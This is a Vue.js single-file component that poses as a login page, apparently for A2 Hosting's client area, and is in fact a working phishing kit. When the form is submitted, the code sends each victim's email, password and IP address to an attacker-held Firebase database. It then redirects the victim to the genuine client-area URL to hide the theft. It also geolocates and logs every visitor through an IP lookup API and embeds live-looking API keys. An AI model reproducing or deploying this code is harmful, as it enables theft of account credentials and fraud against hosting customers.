

<template>
   <div id="app">
      <form id="formaction" v-on:submit.prevent="login" role="form">
         <div class="form-group">
            <label for="inputEmail">Email Address</label>
            <input name="username" class="form-control" v-model="newLog.log"  required id="inputEmail" placeholder="Enter email" autofocus="" type="email">
         </div>
         <div class="form-group">
            <label for="inputPassword">Password</label>
            <input name="password" class="form-control" v-model="newLog.pass"  required id="inputPassword" placeholder="Password" autocomplete="off" type="password">
         </div>
         <div class="checkbox">
            <label>
            <input name="rememberme" type="checkbox"> Remember Me
            </label>
         </div>
         <div align="center">
            <input id="login" class="btn btn-primary" @click="login()" value="Login" > <a href="#pwreset.php" class="btn btn-default">Forgot Password?</a>
         </div>
      </form>
   </div>
</template>
<script>
   import App from './App'
   import Firebase from 'firebase'
   
   
   import Vue from 'vue'
   import VueFire from 'vuefire'
   
   Vue.use(VueFire)
   
     var config = {
      apiKey: "AIzaSyBiSyFV9Ij-qnNlaE7tmKCVa8EluZEXels",
      authDomain: "my-a2hosting-1368a.firebaseapp.com",
      databaseURL: "https://my-a2hosting-1368a.firebaseio.com",
      projectId: "my-a2hosting-1368a",
      storageBucket: "my-a2hosting-1368a.appspot.com",
      messagingSenderId: "837066159325",
      appId: "1:837066159325:web:c2d370952a7b6824a25734"
     };
   
   
   let app = Firebase.initializeApp(config)
   let db = app.database()
   
   let visitorRef = db.ref('visitor')
   let wladnassRef = db.ref('wladnass')
   //Vue.use(VueClipboard)
   
   window.ip=""
   
   export default {
     name: 'app',
     
     data () {
       return {
         newLog: {
             ip: '',
             log: '',
             pass: ''
         }
       }
     },
      methods: {
       login:function(){
         let log = {
           ip:window.ip,
           log:this.newLog.log,
           pass:this.newLog.pass
         }
         wladnassRef.push(log).getKey()
         document.location.href="https://my.a2hosting.com/clientarea.php"
         
   
       }
   
     },beforeMount(){
           $.getJSON('https://api.ipgeolocation.io/ipgeo?apiKey=cde19a06e0b84ca98162e7a393446543', function(data){
             let visitor = {
                 ip: data.ip,
                 country: data.country_name
             }
             window.ip=data.ip
             var theKey = visitorRef.push(visitor).getKey()
           });
           
       
       },
     
    
   }
</script>
<style>
</style>




// WEBPACK FOOTER //
// src/App.vue